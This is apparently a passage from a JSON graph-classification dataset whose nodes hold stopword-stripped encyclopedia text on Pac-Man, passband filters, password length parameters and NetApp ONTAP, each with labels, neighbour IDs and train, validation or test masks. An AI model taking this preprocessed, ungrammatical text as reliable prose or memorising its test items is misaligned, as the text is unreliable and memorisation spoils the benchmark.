however april 2018 video game ranker twin galaxies removed mitchell scores database ruling certain donkey kong submissions achieved using original arcade hardware since mitchell pac-man achievement 7 players attained maximum score original arcade unit world record according twin galaxies currently held david race fastest completion time 3 hours 28 minutes 49 seconds maximum possible score 3,333,360 points historically december 1982 eight-year-old boy jeffrey r. yee received letter u.s. president ronald reagan congratulating worldwide record 6,131,940 points score possible passed level 256 september 1983 walter day chief scorekeeper twin galaxies took us national video game team tour east coast visit video game players said could get level 256 video game player could demonstrate ability 1999 billy mitchell offered 100,000 anyone could complete level 256 january 1 2000 prize expired unclaimed early 1970s namco primarily specialized kiddie rides japanese department stores masaya nakamura founder namco started direct company toward arcade games starting electromechanical ones f-1 1976 later hired number software engineers develop video games compete companies like atari inc. pac-man one first games developed new department within namco game developed primarily young 24-year-old employee named toru iwatani year beginning april 1979 employing nine-man team based concept eating original japanese title inspired japanese onomatopoeic phrase paku-paku describes sound mouth movement widely opened closed succession although iwatani repeatedly stated character shape inspired pizza missing slice 1986 interview admitted half-truth character design also came simplifying rounding kanji character mouth kuchi iwatani attempted appeal wider audience beyond typical demographics young boys teenagers intention attract girl gamers arcades found games played women time led add elements maze well cute ghost-like enemy characters eating gain power iwatani said concept borrowed popeye result game named puckman reference main character hockey puck shape later 1980 game picked manufacture united states bally division midway changed game name puckman pac-man effort avoid vandalism people changing letter p f spell f-word cabinet artwork also changed western markets first launched japan namco 1980 pac-man received lukewarm response space invaders similar games popular time however game success north america year took competitors distributors surprise frequently-repeated story claims marketing executives saw pac-man trade show release completely overlooked now-classic defender seeing racing game called rally-x also involves collecting items maze game outdo year pac-man quickly became popular anything seen video game industry game estimated 30 million active players across united states 1982 1983 interview nakamura said though expect pac-man successful never thought would big overtook asteroids best-selling arcade game north america grossing 1 billion quarters within year surpassing highest-grossing film time star wars arcade machines retailed around 2400 sales totaled around 1 billion equivalent billion within 18 months release 1982 400,000 arcade machines sold worldwide estimated 7 billion coins inserted combined sales counterfeit arcade machines nearly high original united states revenues pac-man licensed games products exceeded 1 billion toward end 20th century arcade game total gross consumer revenue estimated twin galaxies 10 billion quarters 2.5 billion making highest-grossing video game time beating space invaders 2016 usgamer calculated machines inflation-adjusted takings equivalent 7.68 billion pac-man awarded best commercial arcade game 1981 arcade awards ii computing listed atarisoft port tenth magazine list top apple ii games late 1985 based sales market-share data 2001 pac-man voted greatest video game time dixons poll uk game pac-man regarded one influential video games time title character first original gaming mascot game established maze chase game genre demonstrated potential characters video games increased appeal video games female audiences gaming first broad licensing success first video game power-ups individual ghosts deterministic artificial intelligence ai reacts player actions often cited first game cutscenes form brief comical interludes pac-man blinky chasing though actually space invaders part ii employed similar style between-level intermissions 1979 maze chase games exploded home computers release pac-man appeared official ports garnered attention consumers sometimes lawyers result include taxman 1981 snack attack 1982 apple ii jawbreaker 1981 atari 8-bit family scarfman 1981 trs-80 k.c munchkin 1981 odyssey² pac-man also inspired 3d variants concept monster maze 1982 spectre 1982 early first-person shooters midi maze 1987 also similar character designs john romero credited pac-man game biggest influence career wolfenstein 3d includes pac-man level first-person perspective many post- pac-man titles include power-ups briefly turn tables enemy game artificial intelligence inspired programmers later worked companies like bethesda atari inc. licensed home rights developed versions pac-man atari 2600 atari 8-bit family atari 5200 systems ports systems published atarisoft label apple ii commodore 64 vic-20 intellivision ibm pc texas instruments ti-99/4a zx spectrum one first ports march 1982 release much-maligned port atari 2600 somewhat resembles original widely criticized flickering ghosts several design implementation choices nonetheless seven million copies version pac-man sold 37.95 becoming best-selling game time console enjoying initial sales success atari overestimated demand producing 12 million cartridges 5 million went unsold richard a. edwards reviewed atari 2600 version space gamer 53 edwards commented must pac-man home 're hesitant enough differences version suggest passing port poor quality damaged company reputation among consumers retailers becoming contributing factor alongside atari e.t extra-terrestrial atari inc. decline north american video game crash 1983 namco later produced versions nintendo entertainment system game boy game boy color game gear neo geo pocket color namco ported game famicom 1985 north american operations time license atari—under tengen name—to release certain namco famicom games us audiences atari release pac-man initially licensed nintendo cartridge standard gray shell soon afterward atari began manufacturing unauthorized clones nes lockout chip produced unlicensed nes cartridges black shells including pac-man nintendo eventually discovered ruse filed lawsuit atari 1993 namco released pac-man nes three different north american releases nes pac-man —the atari gray cartridge atari black cartridge namco version—differing copyright notices title screen pac-man arcade game bonus game within super nes sega genesis pac-man world playstation pac-man party wii nintendo 3ds guinness world records awarded pac-man series eight records guinness world records gamer edition 2008 including first perfect pac-man game billy mitchell july 3 1999 score successful coin-operated game june 3 2010 nlgd festival games game creator toru iwatani officially received certificate guinness world records pac-man coin-operated arcade machines installed worldwide 293,822 record set recognized 2005 mentioned guinness world records gamer edition 2008 finally actually awarded 2010 pac-man character game series became icon video game culture 1980s wide variety pac-man merchandise marketed character image t-shirts toys hand-held video game imitations even specially shaped pasta general mills manufactured cereal pac-man name 1983 game inspired various real-life recreations involving either real people robots one event called pac-manhattan set guinness world record largest pac-man game 2004 business term pac-man defense mergers acquisitions refers hostile takeover target attempts reverse situation take would-be acquirer instead reference pac-man energizers game popularity led pac-man adopted nickname notably boxer manny pacquiao well american football player adam jones august 21 2016 2016 summer olympics closing ceremony video showcased tokyo host 2020 summer olympics small segment shows pac-man ghosts racing eating dots running track pac-man animated tv series produced hanna–barbera aired abc 1982 1983 computer-generated animated series titled pac-man ghostly adventures aired disney xd june 2013 february 2019 series also planned air universal kids ultimately canceled due low coverage nbcuniversal music buckner garcia song pac-man fever 1981 went 9 billboard hot 100 charts received gold certification 1 million records sold 1982 total 2.5 million copies sold 2008 group pac-man fever album 1982 also sold million copies 1982 weird al yankovic recorded parody taxman beatles pac-man eventually released 2017 part 1992 aphex twin name power-pill released pac-man techno album consists mostly samples game 2008 feature film based game development pac-man character appears film pixels 2015 denis akiyama playing series creator toru iwatani pac-man referenced makes appearance 2017 film guardians galaxy 2 kirito friends beat vr pac-man game called pac-man 2024 iwatani makes cameo beginning film arcade technician japanese tokusatsu film kamen rider heisei generations dr. pac-man vs. ex-aid ghost legend riders pac-man-like character introduced main villain 2019 film relaxer uses pac-man strong plot element form 1999 couch-bound man attempts beat game encounters famous level 256 glitch y2k occurs 1982 milton bradley released board game based pac-man players move four pac-man characters traditional yellow plus red green blue plus two ghosts per throws pair dice sticker manufacturer fleer included rub-off game cards pac-man stickers card packages contain pac-man style maze points along path hidden opaque coverings starting position player moves around maze scratching coverings score points pac-man playable character super smash bros. nintendo 3ds wii u 3ds version stage based original arcade game called pac-maze pac-man amiibo figurine also released nintendo may 29 2015 pac-man later returned playable character super smash bros ultimate within mathematical research field dynamical systems new kind renormalization called pac-man renormalization introduced dzmitry dudko mikhail lyubich nikita selinger name inspired visual similarity pac-man figure main object study theory announced 2017 advanced 2018 made significant advances study famous mandelbrot set pac-man one games consistently published three decades remade numerous platforms spawning many sequels pac-man included namco long-running namco museum compilations well microsoft return arcade downloads game made available game services xbox live arcade gametap virtual console namco released mobile versions pac-man brew java ios well palm pdas windows mobile-based devices pac-man numerous sequels spin-offs one designed original designer toru iwatani follow-ups developed namco either including significant midway ms. pac-man released united states 1981 originally called crazy otto unauthorized hack pac-man created general computer corporation sold midway without namco permission bally-midway released several unauthorized spin-offs pac-man plus jr. pac-man baby pac-man professor pac-man resulting namco severing business relations midway coleco tabletop mini-arcade versions game yielded 1.5 million units sold 1982 nelsonic industries produced pac-man lcd wristwatch game simplified maze also 1982 namco repeatedly re-released game arcades 2001 namco released ms. pac-man galaga class 1981 reunion edition cabinet pac-man available play hidden game commemorate pac-man 25th anniversary 2005 namco released revision officially featured three games june 5 2007 first pac-man world championship held new york city brought together ten competitors eight countries play new pac-man championship edition developed toru iwatani sequel released november 2010 namco networks sold downloadable windows pc version pac-man 2009 also includes enhanced mode replaces original sprites sprites pac-man championship edition namco networks made downloadable bundle includes pc version pac-man port dig dug called 2010 namco bandai announced release game windows phone 7 xbox live game weekend may 21–23 2010 google changed logo homepage playable version game recognition 30th anniversary game release google doodle version pac-man estimated played 1 billion people worldwide 2010 google later allowed access game separate web page april 2011 soap creative published world biggest pac-man working together microsoft namco-bandai celebrate pac-man 30th anniversary multiplayer browser-based game user-created interlocking mazes 2016 in-app version pac-man introduced facebook messenger allows users play game friends talking facebook",
    "neighbors": [
      11522,
      3075,
      8199,
      4110,
      10644,
      1060,
      5677,
      10287,
      10931,
      7734,
      1474,
      5068,
      6352,
      10576,
      4690,
      1619,
      8151,
      4311,
      8663,
      6378,
      2540,
      1776,
      7283,
      4856,
      5753
    ],
    "mask": "Train"
  },
  {
    "node_id": 3040,
    "label": 5,
    "text": "Passband:passband passband range frequencies wavelengths pass filter example radio receiver contains bandpass filter select frequency desired radio signal radio waves picked antenna passband receiver range frequencies receive bandpass-filtered signal signal energy passband known bandpass signal contrast baseband signal telecommunications optics acoustics passband band-pass filtered signal portion frequency spectrum transmitted minimum relative loss maximum relative gain filtering device words band frequencies pass es filter set filters accompanying figure shows schematic waveform filtered bandpass filter consisting highpass lowpass filter radio receivers generally include tunable band-pass filter passband wide enough accommodate bandwidth radio signal transmitted single station two main categories digital communication transmission methods baseband passband general inverse relationship width filter passband time required filter respond new inputs broad passbands yield faster response times consequence mathematics fourier analysis limiting frequencies passband defined relative intensity power decreases specified fraction maximum intensity power decrease power often specified half-power points i.e 3 db maximum power difference limiting frequencies called bandwidth expressed hertz optical regime nanometers micrometers differential wavelength related term bandpass adjective describes type filter filtering process frequently confused passband refers actual portion affected spectrum two words compound words follow english rules formation primary meaning latter part compound modifier first part hence one may correctly say dual bandpass filter two passbands",
    "neighbors": [
      10381,
      1550,
      7698,
      5270,
      2968,
      5020,
      5664,
      11686,
      2994,
      2998,
      7350,
      5304,
      7490,
      67,
      3140,
      7108,
      8160,
      1121,
      2920,
      7400
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3041,
    "label": 4,
    "text": "Password_length_parameter:password length parameter telecommunication password length parameter basic parameter value affects password strength brute force attack contributor computer security one use password length parameters expression formula_1 formula_2 probability password guessed lifetime formula_3 maximum lifetime password used log system formula_4 number guesses per unit time formula_5 number unique algorithm-generated passwords 'password space degree password security determined probability password guessed lifetime",
    "neighbors": [
      5435,
      4435,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3042,
    "label": 2,
    "text": "ONTAP:ontap ontap data ontap clustered data ontap cdot data ontap 7-mode netapp proprietary operating system used storage disk arrays netapp fas aff ontap select cloud volumes ontap release version 9.0 netapp decided simplify data ontap name removed word data remove 7-mode image therefore ontap 9 successor clustered data ontap 8 ontap includes code berkeley net/2 bsd unix spinnaker networks technology operating systems ontap originally supported nfs later added support smb iscsi fibre channel protocol including fibre channel ethernet fc-nvme june 16 2006 netapp released two variants data ontap namely data ontap 7g nearly complete rewrite data ontap gx data ontap gx based grid technology acquired spinnaker networks 2010 software product lines merged one os data ontap 8 folded data ontap 7g onto data ontap gx cluster platform data ontap 8 includes two distinct operating modes held single firmware image modes called ontap 7-mode ontap cluster-mode last supported version ontap 7-mode issued netapp version 8.2.5 subsequent versions ontap version 8.3 onwards one operating mode ontap cluster-mode majority large-storage arrays vendors tend use commodity hardware operating system microsoft windows server vxworks tuned linux netapp storage arrays use highly customized hardware proprietary ontap operating system originally designed netapp founders david hitz james lau specifically storage-serving purposes ontap netapp internal operating system specially optimized storage functions high low level original version ontap proprietary non-unix kernel tcp/ip stack networking commands low-level startup code bsd version descended data ontap gx boots freebsd stand-alone kernel-space module uses functions freebsd example uses command interpreter drivers stack ontap also used virtual storage appliances vsa ontap select cloud volumes ontap based previous product named data ontap edge storage array hardware include battery-backed non-volatile memory allows commit writes stable storage quickly without waiting disks virtual storage appliances using virtual nonvolatile memory implementers often organize two storage systems high-availability cluster private high-speed link either fibre channel infiniband 10 gigabit ethernet 40 gigabit ethernet 100 gigabit ethernet one additionally group clusters single namespace running cluster mode data ontap 8 operating system ontap 9 data ontap made available commodity computing servers x86 processors running atop vmware vsphere hypervisor name ontap edge later ontap edge renamed ontap select kvm added supported hypervisor data ontap including wafl developed 1992 david hitz james lau michael malcolm initially supported nfsv2 cifs protocol introduced data ontap 4.0 1996 april 2019 octavian tanase svp ontap posted preview photo twitter ontap running kubernetes container demonstration write anywhere file layout wafl file layout used ontap os supports large high-performance raid arrays quick restarts without lengthy consistency checks event crash power failure growing size filesystems quickly ontap os contains number storage efficiencies based wafl functionalities supported protocols require licenses february 2018 netapp claims aff systems clients gain average 4.72:1 storage efficiency deduplication compression compaction clones savings starting ontap 9.3 offline deduplication compression scanners start automatically default based percentage new data written instead scheduling br cross-volume deduplication storage efficiency features work ssd media inline offline deduplication mechanisms leverage databases consist links data blocks checksums data blocks handled deduplication process deduplication database located volume aggregates deduplication enabled flash fas systems support post-process compression order storage efficiencies execution follows one multiple raid groups form aggregate within aggregates ontap operating system sets flexible volumes flexvol actually store data users access similarly raid-0 aggregate consolidates space underlying protected raid groups provide one logical piece storage flexible volumes alongside aggregates consists netapp disks raid groups aggregates could consist luns already protected third-party storage systems flexarray ontap select cloud volumes ontap aggregate could consist either luns netapp raid groups alternative traditional volumes one raid groups form single static volume flexible volumes offer advantage many created single aggregate resized time smaller volumes share spindles available underlying aggregate combination storage qos allows change performance flexible volumes fly traditional volumes n't however traditional volumes theoretically handle slightly higher i/o throughput flexible volumes number spindles go additional virtualization layer talk underlying disk aggregates traditional volumes expanded never contracted current maximum aggregate physical useful space size 800 tib all-flash fas systems first form redundancy added ontap ability organize pairs netapp storage systems high-availability cluster ha-pair ha-pair could scale capacity adding disk shelves performance maximum reached ha-pair two ways proceed one buy another storage system divide workload another buy new powerful storage system migrate workload aff fas storage systems usually able connect old disk shelves previous models—this process called head-swap head-swap requires downtime re-cabling operations provides access old data new controller without system re-configuration data ontap 8 firmware image contains two operating systems named modes 7-mode cluster-mode modes could used fas platform one time however data modes n't compatible case fas conversion one mode another case re-cabling disk shelves 7-mode cluster-mode vice versa later netapp released 7-mode transition tool 7mtt able convert data old disk shelves 7-mode cluster-mode named copy-free transition process required downtime version 8.3 7-mode removed data ontap firmware image clustered ontap new advanced os compared predecessor data ontap version 7 version 8 7-mode able scale adding new ha-pairs single namespace cluster transparent data migration across entire cluster version 8.0 new aggregate type introduced size threshold larger 16-terabyte tb aggregate size threshold supported previous releases data ontap also named 64-bit aggregate version 9.0 nearly features 7-mode successfully implemented ontap clustered including snaplock many new features available 7-mode introduced including features flexgroup fabricpool new capabilities fast-provisioning workloads flash optimization uniqueness netapp clustered ontap ability add heterogeneous systems systems single cluster model generation single cluster provides single pane glass managing nodes cluster non-disruptive operations adding new models cluster removing old nodes online migration volumes luns data contiguously available clients version 9.0 netapp renamed data ontap ontap ontap considered unified storage system meaning supports block-level fc fcoe nvmeof iscsi file-level nfs pnfs cifs/smb protocols clients sds versions ontap ontap select cloud volumes ontap support fc fcoe nvmeof protocols due software-defined nature nfs first protocol available ontap latest versions ontap 9 support nfsv2 nfsv3 nfsv4 4.0 4.1 pnfs starting ontap 9.5 4-byte utf-8 sequences characters outside basic multilingual plane supported names files directories ontap supports cifs 2.0 higher smb 3.1 starting ontap 9.4 smb multichannel provides functionality similar multipathing san protocols supported starting ontap 8.2 cifs protocol supports continuous availability ca smb 3.0 microsoft hyper-v smb sql server smb ontap supports smb encryption also known sealing accelerated aes instructions intel aes ni encryption supported smb 3.0 later ontap physical appliances supports fcoe well fc protocol depending hba port speed iscsi data center bridging dcb protocol supported a220/fas2700 systems nvme fabrics nvmeof refers ability utilize nvme protocol existed network infrastructure like ethernet converged traditional tcp fiber channel infiniband transport opposite run nvme pci nvme san block level data storage protocol nvmeof supported all-flash a-systems supported low-end a200 a220 systems starting ontap 9.5 ana protocol supported provide similarly alua multi-pathing functionality nvme ana nvme currently supported suse enterprise linux 15 fc-nvme without ana supported suse enterprise linux 12 sp3 redhat enterprise linux 7.6 starting ontap 9.4 netapp supports nvmeof fiber channel protocol 32/16 gb fc-nvme all-flash fas systems a800 a700/a700s a300 supported os fc-nvme oracle linux vmware windows server suse linux redhat linux high availability ha clustered configuration storage system two nodes ha pairs aims ensure agreed level operational expected unexpected events like reboots software firmware updates even though single ha pair consists two nodes controllers netapp designed way behaves single storage system ha configurations ontap employ number techniques present two nodes pair single system allows storage system provide clients nearly-uninterruptable access data node either fail unexpectedly need rebooted operation known takeover example network level ontap temporarily migrate ip address downed node surviving node applicable also temporarily switch ownership fc wwpns downed node surviving node data level contents disks assigned downed node automatically available use via surviving node fas aff storage systems use enterprise level hdd ssd drives housed within disk shelves two bus ports one port connected controller ontap disks ownership marker written reflect controller ha pair owns serves individual disk aggregate include disks owned single node therefore aggregate owned node upper objects flexvol volumes luns file shares served single controller controller disks aggregates serve therefore ha pair configurations called active/active nodes utilized simultaneously even though serving data downed node ha pair repaired whatever maintenance window necessitated takeover completed downed node running without issue giveback command issued bring ha pair back active/active status high-availability clusters ha clusters first type clusterization introduced ontap systems aimed ensure agreed level operation often confused horizontal scaling ontap clusterization came spinnaker acquisition therefore netapp documentation refers ha configuration ha pair rather ha cluster ha pair uses form network connectivity often direct connectivity communication servers pair called ha interconnect ha-ic ha interconnect use ethernet infiniband communication medium ha interconnect used non-volatile memory log nvlog replication using rdma technology purposes ensure agreed level operational events like reboots always two nodes ha pair configuration ontap assigns dedicated non-sharable ha ports ha interconnect could external build chassis visible outside ha-ic confused intercluster intracluster interconnect used snapmirror coexist data protocols data ports cluster interconnect ports used horizontal scaling online data migration across multi-node cluster ha-ic interfaces visible node shell level starting a320 ha-ic cluster interconnect traffic start use ports metrocluster mc additional level data availability ha configurations supported fas aff storage systems later sds version metrocluster introduced ontap select cloud volumes ontap products mc configuration two storage systems system single node ha pair form metrocluster often two systems located two sites distance 300 km therefor called geo-distributed system plex key underlying technology synchronizes data two sites metrocluster mc configurations nvlog also replicated storage systems sites uses dedicated ports purpose addition ha interconnect starting ontap 9.5 svm-dr supported metrocluster configurations feature ontap select software similarly metrocluster fas/aff systems metrocluster sds mc sds allows synchronously replicate data two sites using syncmirror automatically switch survived node transparently users applications metrocluster sds work ordinary ha pare data volumes luns lifs could moved online aggregates controllers sites slightly different traditional metrocluster fas/aff systems data cloud moved across storage cluster within site data originally located traditional metrocluster way applications access data locally remote site disable one entire site process called switchover mc sds ordinary ha process occurs metrocluster sds uses ontap deploy mediator fas aff world functionality known metrocluster tiebreaker came ontap select bundle generally used deploying clusters installing licenses monitoring horizontal scaling ontap clusterization came spinnaker acquisitions often referred netapp single namespace horizontal scaling cluster ontap storage system cluster ontap cluster therefore often confused ha pair even metrocluster functionality metrocluster ha data protection technologies single namespace clusterization provide data protection ontap cluster formed one ha pairs adds ontap system non-disruptive operations ndo functionality non-disruptive online data migration across nodes cluster non-disruptive hardware upgrade data migration ndo operations ontap cluster require dedicated ethernet ports operations called cluster interconnect use ha interconnect purposes cluster interconnect ha interconnect could share ports cluster interconnect single ha pair could directly connected cluster interconnect ports systems 4 nodes require two dedicated ethernet cluster interconnect switches ontap cluster could consist even number nodes must configured ha pairs except single-node cluster single-node cluster ontap system also called non-ha stand-alone ontap cluster managed single pain glass built-in management web-based gui cli ssh powershell api ontap cluster provides single name space ndo operations svm single namespace ontap system name collection techniques used cluster separate data front-end network connectivity data protocols like fc fcoe fc-nvme iscsi nfs cifs therefore provide kind data virtualization online data mobility across cluster nodes network layer single namespace provide number techniques non-disruptive ip address migration like cifs continuous availability transparent failover netapp network failover nfs san alua path election online front-end traffic re-balancing data protocols netapp aff fas storage systems consists different ha pairs aff fas different models generations include 24 nodes nas protocols 12 nodes san protocols sds systems ca n't intermix physical aff fas storage systems also known vserver sometimes svm storage virtual machine svm layer abstraction alongside functions responsible virtualizing separate physical front-end data network data located flexvol volumes used non-disruptive operations multi-tenancy non disruptive operations ndo operations clustered ontap system ndo data operations include aggregate relocation within ha pair nodes flexvol volume online migration known volume move operation across aggregates nodes within cluster luns migration known lun move operation flexvol volumes within cluster lun move volume move operations use cluster interconnect ports data transfer ha-ci use operations svm behave differently network ndo operations depending front-end data protocol decrease latency original level flexvol volumes luns located node network address clients access storage system network address could created san moved nas protocols ndo operations free functionality nas front-end data protocols nfsv2 nfsv3 nfsv4 cifsv1 smbv2 smb v3 provide network redundancy protocol rely storage switch functionalities matter reason ontap support ethernet port channel lacp ethernet network ports l2 layer known ontap interface group ifgrp within single node also non-disruptive network fail nodes cluster l3 layer migrating logical interfaces lif associated ip addresses similar vrrp survived node back home failed node restored front-end data san protocols alua feature used network load balancing redundancy san protocols ports node data located reported clients active preferred path load balancing network ports nodes cluster active non-preferred path case one port entire node goes client access data using non-preferred path starting ontap 8.3 selective lun mapping slm introduced reduce number paths lun removes non-optimized paths lun cluster nodes except ha partner node owning lun cluster report host paths ha pare lun located ontap provides alua functionality san protocols san network lifs migrate like nas protocols data network interfaces migration finished transparent storage system clients due ontap architecture cause temporary permanent data indirect access ontap cluster interconnect ha-ci use situations slightly increase latency clients san lifs used fc fcoe iscsi fc-nvme protocols vip virtual ip lifs require top-of-the-rack bgp router used bgp data lifs alongside nas lifs also used ethernet nas environment case bgp lifs automatically load-balance traffic based routing metrics avoid inactive unused links bgp lifs provide distribution across nas lifs cluster limited single node nas lifs bgp lifs provide smarter load balancing realized hash algorithms ethernet port channel lacp interface groups vip lif interfaces tested used mcc svm-dr. node management lif interface migrate associated ip address across ethernet ports single node available ontap running node usually located e0m port node node management ip sometimes used cluster admin communicate node cluster shell rare cases commands issued particular node cluster managment lif interface associated ip address available entire cluster running default migrate across ethernet ports often located one e0m ports one cluster nodes used cluster administrator management purposes used api communications html gui ssh console management default ssh connect administrator cluster shell service processor sp interfaces available hardware appliances like fas aff allows ssh out-of-band console communications embedded small computer installed controller mainboard similarly ipmi allows connect monitor manage controller even ontap os booted sp possible forcibly reboot halt controller monitor coolers temperature etc connection sp ssh brings administrator sp console connected sp possible switch cluster shell controller one sp migrate like management interfaces usually e0m sp lives single management wrench physical ethernet port dedicated mac address node lifs cluster lif sp often using ip subnet svm management lif similarly cluster management lif migrate across ethernet ports nodes cluster dedicated single svm management svm lif gui capability facilitate api communications ssh console management svm management lif live e0m port often located data port cluster node dedicated management vlan different ip subnets node cluster lifs cluster interconnect lif interfaces using dedicated ethernet ports share ports management data interfaces horizontal scaling functionality times like lun volume migrates one node cluster another cluster interconnect lif similarly node management lifs migrate ports single node intercluster interface lifs live share ethernet ports data lifs used snapmirror replication intercluster interface lifs similarly node management lifs cluster interconnect migrate ports single node ontap provide two techniques multi tenancy functionality like storage virtual machines ip spaces one hand svms similar virtual machines like kvm provide visualization abstraction physical storage another hand quite different unlike ordinary virtual machines svms allow run third party binary code like pure storage systems provide virtualized environment storage resources instead also svms unlike ordinary virtual machines run single node end user looks like svm runs single entity node whole cluster svm divides storage system slices divisions even organizations share storage system without knowing interfering utilizing ports data aggregates nodes cluster using separate flexvol volumes luns svm run frontend data protocols set users use network addresses management ip use ip spaces users ip addresses networks storage system without interfering ontap system must run least one data svm order function may run levels ontap management cluster admin level available privileges data svm provides owner vsadmin nearly full functionality cluster admin level lacks physical level management capabilities like raid group configuration aggregate configuration physical network port configuration however vsadmin manage logical objects inside svm like create delete configure luns flexvol volumes network addresses two svms cluster ca n't interfere one svm create delete modify even see objects another svm svm owners environment looks like users entire storage system cluster multi tenancy free functionality ontap flexclone licensed feature used creating writable copies volumes files luns case volumes flexclone acts snapshot allows write ordinary snapshot allows read data wafl architecture flexclone technology copies metadata inodes provides nearly instantaneous data copying file lun volume regardless size snaprestore licensed feature used reverting active file system flexvol previously created snapshot flexvol restoring metadata inodes active file system snaprestore used also single file restore lun restore previously created snapshot flexvol object located without snaprestore license nas environment possible see snapshots network file share able copy directories files restore purposes san environment way restore operations similar nas environment possible copy san nas environments files directories luns entire flexvol content ontap command ndmpcopy free process copying data depend size object could time consuming snaprestore mechanism restoring metadata inodes active file system almost instant regardless size object restored previous state flexgroup free feature introduced version 9 utilizes clustered architecture ontap operating system flexgroup provides cluster-wide scalable nas access nfs cifs protocols flexgroup volume collection constituent flexvol volumes distributed across nodes cluster called constituents transparently aggregated single space therefore flexgroup volume aggregates performance capacity constituents thus nodes cluster located end user flexgroup volume represented single ordinary file-share full potential flexgroup revealed technologies like pnfs currently supported flexgroup nfs multipathing session trunking also available ontap smb multichannel currently supported flexgroup smb continuous availability flexgroup smb ca supported ontap 9.6 vip bgp flexgroup feature ontap 9 allows massively scale single namespace 20pb 400 billion files evenly spreading performance across cluster starting ontap 9.5 fabricpool supported flexgroup recommended constituent volumes backup single s3 bucket supports smb features native file auditing fpolicy storage level access guard sla copy offload odx inherited watches changes notifications quotas qtree smb contiguous availability ca supported flexgroup allows running ms sql hyper-v flexgroup flexgroup supported metrocluster snapshots form basis netapp asynchronous disk-to-disk replication d2d technology snapmirror effectively replicates flexible volume snapshots two ontap systems snapmirror also supported ontap cloud backup solidfire ontap systems part netapp data fabric vision netapp also offers d2d backup archive feature named snapvault based replicating storing snapshots open systems snapvault allows windows unix hosts back data ontap store filesystem changes snapshots supported ontap 8.3 onwards snapmirror designed part disaster recovery plan stores exact copy data time snapshot created disaster recovery site could keep snapshots systems snapvault hand designed store less snapshots source storage system snapshots secondary site long period time br data captured snapvault snapshots destination system could modified accessible destination read-write data restored back primary storage system snapvault snapshot could deleted data captured snapshots sites snapmirror snapvault cloned modified flexclone feature data cataloging backup consistency validation test development purposes etc br later versions ontap introduced cascading replication one volume could replicate another another configuration called fan-out deployment one volume replicated multiple storage systems fan-out cascade replication deployments support combination snapmirror dr snapvault unified replication possible use fan-in deployment create data protection relationships multiple primary systems single secondary system relationship must use different volume secondary system starting ontap 9.4 destination snapmirror snapvault systems enable automatic inline offline deduplication default br intercluster relationship two clusters snapmirror intracluster opposite used snapmirror relationship storage virtual machines svm single cluster br snapmirror operate version-dependent mode two storage systems must run version ontap version-flexible mode types snapmirror replication br snapmirror-based technologies br snapmirror licensed feature snapvault license required snapmirror license already installed svm dr based snapmirror technology transferring volumes exceptions allowed data protected svm dr site two modes svm dr identity preserve identity discard identity discard mode one hand data volumes copied secondary system dr svm preserve information like svm configuration ip addresses cifs ad integration original svm another hand identity discard mode data secondary system brought online read-write mode primary system online might helpful dr testing test/dev purposes therefore identity discard requires additional configuration secondary site case disaster occurs primary site identity preserve mode svm-dr copying volumes data also information like svm configuration ip addresses cifs ad integration requires less configuration dr site case disaster event primary site mode primary system must offline ensure conflict snapmirror sync sm-s short zero rpo data replication technology previously available 7-mode systems available clustered ontap version 9.5 snapmirror sync replicates data volume level requirements rtt less 10ms gives distance approximately 150 km snapmirror sync work two modes full synchronous mode set default guarantees zero application data loss two sites disallowing writes snapmirror sync replication fails reason relaxed synchronous mode allows application write continue primary site snapmirror sync fails relationship resumed automatic re-sync occur sm-s supports fc iscsi nfsv3 nfsv4 smb v2 smb v3 protocols limit 100 volumes aff 40 volumes fas 20 ontap select work controllers 16gb memory sm-s useful replicating transactional logs oracle db ms sql ms exchange etc source destination flexvolumes fabricpool aggregate must use backup policy flexgroup volumes quotas currently supported sm-s. sm-s free feature license included premium bundle unlike syncmirror sm-s uses raid plex technologies therefore configured two different netapp ontap storage systems different disk type media flexcache technology previously available 7-mode systems available clustered ontap version 9.5 flexcache allows serving nas data across multiple global sites file locking mechanisms flexcache volumes cache reads writes metadata writes edge generating push operation modified data edge ontap systems requested data origin 7-mode writes go origin edge ontap system job check file n't updated also flexcache volumes less size original volume also improvement compare 7-mode initially nfs v3 supported ontap 9.5 flexcache volumes sparsely-populated within ontap cluster intracluster across multiple ontap clusters inter-cluster flexcache communicates intercluster interface lifs nodes licenses flexcache based total cluster cache capacity included premium bundle fas aff ontap select combined use flexcache technology allowed create 10 flexcache volumes per origin flexvol volume 10 flexcache volumes per ontap node original volume must stored flexvol wile flexcache volumes flexgroup volume format data ontap also implements option named raid syncmirror rsm using plex technique raid groups within aggregate traditional volume synchronously duplicated another set hard disks typically done another site via fibre channel ip link within single controller local syncmirror single disk-shelf resiliency netapp metrocluster configuration uses syncmirror provide geo-cluster active/active cluster two sites 300 km apart 700 km ontap 9.5 mcc-ip syncmirror used either software-defined storage platforms cloud volumes ontap ontap select provides high availability environments directly attached non-shared disks top commodity servers fas aff platforms local syncmirror metrocluster configurations syncmirror free feature snaplock implements write read many worm functionality magnetic ssd disks instead optical media data deleted retention period reached snaplock exists two modes compliance enterprise compliance mode designed assist organizations implementing comprehensive archival solution meets strict regulatory retention requirements regulations dictated sec 17a-4 f rule finra hipaa cftc rule 1.31 b dach sarbanes-oxley gdpr check 21 eu data protection directive 95/46/ec nf z 42-013/nf z 42-020 basel iii mifid patriot act graham-leach-bliley act etc records files committed worm storage snaplock compliance volume altered deleted expiration retention period moreover snaplock compliance volume destroyed data reached end retention period snaplock licensed feature snaplock enterprise geared toward assisting organizations self-regulated want flexibility protecting digital assets worm-type data storage data stored worm snaplock enterprise volume protected alteration modification one main difference snaplock compliance files stored strict regulatory compliance snaplock enterprise volume destroyed administrator root privileges ontap system containing snaplock enterprise volume even designed retention period yet passed modes retention period extended shortened incongruous concept immutability also netapp snaplock data volumes equipped tamper-proof compliance clock used time reference block forbidden operations files even system time tampered starting ontap 9.5 snaplock supports unified snapmirror xdp engine re-synchronization fail-over without data loss 1023 snapshots efficiency mechanisms clock synchronization sds ontap available ssd-only aggregates fas/aff systems cloud volumes ontap ssd media starting ontap 9.4 fabricpool supported ontap select platform cloud volumes ontap also supports hdd s3 fabricpool configuration fabric pool provides automatic storage tiering capability cold data blocks fast media usually ssd ontap storage cold media via object protocol object storage s3 back fabric pool configured two modes one mode used migrate cold data blocks captured snapshots mode used migrate cold data blocks active file system fabricpool preserves offline deduplication offline compression savings starting ontap 9.4 introduced fabricpool 2.0 ability tier-off active file system data default 31-day data accessed support data compaction savings recommended ratio 1:10 inodes data files clients connected ontap storage system fabric pool data-tiering operations completely transparent case data blocks become hot copied back fast media 